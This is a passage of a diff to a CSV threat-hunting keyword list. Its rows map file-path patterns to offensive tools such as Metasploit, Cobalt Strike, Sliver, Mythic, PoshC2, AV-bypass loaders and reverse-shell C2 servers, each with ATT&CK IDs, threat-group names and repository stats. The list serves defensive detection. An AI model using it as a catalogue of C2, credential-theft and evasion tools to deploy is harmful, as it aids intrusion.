APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Bypass/payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/bypass_mod/loader*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*/BypassAV/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*/bypassAV-1/*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*/BypassCredGuard.git*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/C2/Beacon/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/C2/c2.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*/C2/Http/*.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/C2/server.py*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*/C2/SmbListener.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/C2_Server.git*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/c2_server/resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/C2concealer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/C2Frame.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2Manager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2profile.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/C2Profiles/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2script/*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" -"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to 